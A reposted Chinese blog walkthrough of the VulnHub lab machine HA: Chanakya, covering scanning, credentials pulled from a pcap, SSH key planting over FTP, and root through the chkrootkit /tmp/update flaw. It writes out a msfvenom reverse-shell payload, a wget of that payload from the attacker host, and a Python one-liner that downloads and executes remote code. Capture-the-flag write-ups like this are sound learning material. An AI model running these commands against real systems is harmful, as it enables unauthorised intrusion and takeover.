码迷,mamicode.com
首页 > 其他好文 > 详细

chanakya

时间:2020-06-13 10:25:57      阅读:76      评论:0      收藏:0      [点我收藏+]

标签:com   load   netfilter   date   图片   auth   version   sim   elf   

仅供个人娱乐

参考http://www.saulgoodman.cn/HA-Chanakya.html

靶机信息

https://www.vulnhub.com/entry/ha-chanakya,395/

一、主机探测

arp-scan -l

技术图片

nmap -sV -p 1-65535 -A 192.168.236.136

技术图片

dirb http://192.168.236.136

技术图片
技术图片
技术图片
技术图片
技术图片

 

技术图片

二、漏洞的查找和利用

百度   得到ROT13的加密方式

技术图片

pcap流量包,直接下载即可

技术图片
技术图片

ashoka                             kautilya

首先进行21端口登录

技术图片

22端口登陆失败

技术图片

创建ssh-keygen

上传.ssh 使用kali免密登录

ssh-keygen

技术图片

然后我们把id_rsa.pub里的内容重定向到authorized_keys文件中

root@kali:~/桌面# cd ~/.ssh

root@kali:~/.ssh# cat id_rsa.pub > authorized_keys

技术图片

mkdir .ssh

cd.ssh

put authorized_keys

技术图片

root@kali:~/.ssh# ssh ashoka@192.168.236.136

技术图片

提权

先msf生成一个木马反弹一个meterpreter回话过来

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.236.129 LPORT=4444 -f elf > shell.elf

技术图片

python -m SimpleHTTPServer

msfconsole

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set lport 4444

set lhost 192.168.236.129

技术图片

cd /tmp

wget http://192.168.236.129:8000/shell.elf

技术图片
技术图片

sysinfo

使用post模块来查看可以利用那些提权exploit:

run post/multi/recon/local_exploit_suggester

技术图片

info exploit/linux/local/netfilter_priv_esc_ipv4

技术图片
技术图片

失败

使用命令注入来反弹一个shell:

use exploit/multi/script/web_delivery

技术图片

set lhost 192.168.236.129

技术图片

python -c "import sys;u=__import__(‘urllib‘+{2:‘‘,3:‘.request‘}[sys.version_info[0]],fromlist=(‘urlopen‘,));r=u.urlopen(‘http://192.168.236.129:8080/m9eTnBmiM‘);exec(r.read());"

在目标机运行:

技术图片

使用rootkit攻击模块:

技术图片

这个模块就是利用chkrootkit漏洞:chkrootkit有crontab,会定期以root身份执行/tmp/update文件。

set rhosts 192.168.236.136

set session 1

set lport 8888

exploit

python -c‘import pty;pty.spawn("/bin/bash")‘

 

技术图片
技术图片

参考文章http://www.saulgoodman.cn/HA-Chanakya.html

chanakya

标签:com   load   netfilter   date   图片   auth   version   sim   elf   

原文地址:https://www.cnblogs.com/bingtang123/p/13111695.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!